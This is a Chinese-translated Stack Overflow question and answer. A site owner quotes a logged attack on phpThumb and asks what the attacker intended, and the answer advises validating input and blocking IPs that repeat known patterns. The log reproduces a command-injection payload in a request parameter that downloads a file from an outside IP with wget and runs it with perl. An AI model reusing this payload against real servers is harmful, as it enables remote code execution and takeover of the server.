我认为我从攻击者那里得到了错误。他们想做什么以及如何阻止他们?这是日志:
Monday 26th of December 2011 12:10:18 PM
src=file.jpg&fltr[]=blur|
9%20-quality%20%2075%20interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9
91.121.133.22
| 39757
| /var/www/class.php
| /class/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9
[src = file.jpg] - [fltr = Array] - [phpThumbDebug = 9] -
我已经将这些区域分隔成新的行。大部分是输入,然后是服务器端口、他们的 ip 地址、他们访问的脚本。看起来他们确实在尝试使用漏洞来访问命令行。但这不是他们认为的剧本。
最佳答案
网络服务器一直受到攻击。任何给定的攻击都试图挑出一个特定的程序。 如果你把你的软件写得很好并且验证了你所有的输入,你的系统应该能够容忍这样的垃圾并礼貌地忽略它。 如果一天只发生 3 次,这不像是 DOS 攻击。 如果你想发疯,你可以写一个脚本来扫描日志,如果你看到一个已知的攻击模式,运行一个脚本来阻止 ip 在 N 次点击后到达你的网络服务器。
关于php - 我写了一个记录所有输入和其他东西的错误记录脚本,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/8673704/